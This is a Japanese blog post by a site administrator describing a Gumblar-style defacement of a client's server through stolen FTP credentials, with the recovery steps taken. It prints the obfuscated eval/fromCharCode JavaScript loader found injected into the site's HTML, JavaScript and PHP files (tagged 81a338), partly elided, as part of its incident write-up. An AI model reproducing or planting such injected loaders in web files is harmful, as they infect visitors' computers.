WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

*

サブコンテンツ

危険な高額塾

タグ

Google Maps API スムーズ テンプレート 大園式転売塾 山下 Chrome 詐欺 SEO 比較 ネットビジネス大全集 エディタ ユーチューブマニアクス2017 ぼかし 伊藤 虎太郎 エクスプローラー タスクバー ブロックポリシー 秀吉塾天下統一 Newpost Catch WP High Concept Marketing IBS ネオヒルズアカデミー 北川 雅嗣 不労所得の神 テーマ ソースコード 切り抜き ライオンアフィリエイト がら空きビジネス google メモ スマホ css ソース セキュリティ Adobe .htaccess functions.php タイガーウイング 伊藤虎太郎 優先順位 切抜き 自己アフィリエイト せどり 音量アイコン 原田真 ビジネス ファビコン XHTML 人物 大西良幸 トラフィック Tiger-Wing 石井匠 池田純矢 サンタ スクロール 株式会社WINGOOD 株式会社SRシステム アフィ匠 プロモーション 中山秀人 ライン Windows アレックス式ネオせどりスクール Wordpress Content Slide トレンドアフィリエイト wordpress パズル document.all クロスアフィリエイト ツール 伊藤 歩 アンダーグラウンドアフィリエイトクラブ クラウド入力機能 81a338 アレックス 定型文 android PPC サイト改ざん アクセス制限 村上省吾 ping クラウド変換 レタープレス 量産 エクスチェンジ インターネット 申請金ビジネス 流出 マルウエア 自動化 ECサイト インターネットエクスプローラー 脆弱性 ムーバブルタイプ 加藤 秀吉 ブロック 新井浩 Firefox 個人情報 KMSpico 久積篤史 CGI MovableTYpe SKナレッジ メルマガ配信システム リンクシェイカー 三橋美仁 RSS office system ネットビジネス 加工 伊藤塾 @PAGES 出店料 ロリポップ IE 既得権益 株式会社Free Agent Style LinkShaker ツイッター FTP 高額塾 RMT Ban Hammer ヤフー Agency Business 改ざん Login LockDown 立体 アンダーグラウンドメソッド SmoothScroll.js 宮田麗花 FireWorks ヤフーショッピング 改竄 WEB 球体 権利収入 Favicon モザイク ブルートフォースアタック クラック 株式会社SRシステム 与沢翼 クリックランキング ワードプレス Extension Manager プラグイン 不正アクセス 放射線 JavaScript 配布 ネットガレージ レビュー Google Maps 登録禁止 無料 短縮URL 賢威 ウイルス force puzzle やしろひろたみ デスクトップ 滑らか 与沢翼×蝶乃舞 インターネットビジネススクール Windows 7 ping送信 twitter 株式会社バンザイ 感染 アドセンス 自動 SyntaxHighlighter アイコン バナー 転売大園塾 レイアウト崩れ YouTube Maniax 2017 ライブチャット 関根塾 フォローマティック 固定ページ ネットゲーム explorer Line 大園麗花 無料オファー MasterCollection EC ネットビジネス最後の楽園 CS5 プロファイル Youtube 到達率 ブラクラ スタイルシート もざ iphone インペリアルゴールド 上位表示 関根義光 マイクロソフト moza バイマ BUYMA ドメイン 個人情報流出 エキスパートメール インフォトップ アフィリエイト 背景 BBIZ 蝶乃舞 DOCTYPE 掲示板 ヤフオク postpost 短縮URLツール CS6 html 詐欺組織 RSS Includes Pages HTML4.0 無断送信 土屋ひろし 日本語入力変換ソフト レンタルサーバー ボタン ウインドウ 秒速で1億円稼ぐ男 ざくざく君 シャンプー 管理ツール wpXサーバー バックアップ Cash on Wordpress 大園転売塾 レイアウト PHP 株式会社A-ブログレス Thunderbird アクセスアップ 特権ビジネス KMS認証 フレンドシップメール ハート Diamond Affiliate Masters Program やしろ塾 画像 getElementById DTD ブラウザ 百度 管理画面 followmatic getElementByTagName Internet Explorer 自己アフィリ ランキング MT Yahoo バイドゥー マニュアル 復元 tool ネットショップ 小笠原健一 コピーボタン 情報商材 株式会社ニュース ソフト グラデーション 表示 Baidu 副業術 高速ゲーム 特定のメールアドレス wp-login.php 不正送信 カスタマイズ IP トレンドキーワード スカイプ ブラシ

アーカイブ

エステトラブル

このページの先頭へ